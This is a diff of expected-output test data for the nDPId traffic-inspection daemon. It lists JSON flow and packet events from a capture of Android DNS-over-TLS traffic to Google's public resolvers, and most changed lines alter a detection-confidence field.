-01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -37,25 +37,25 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 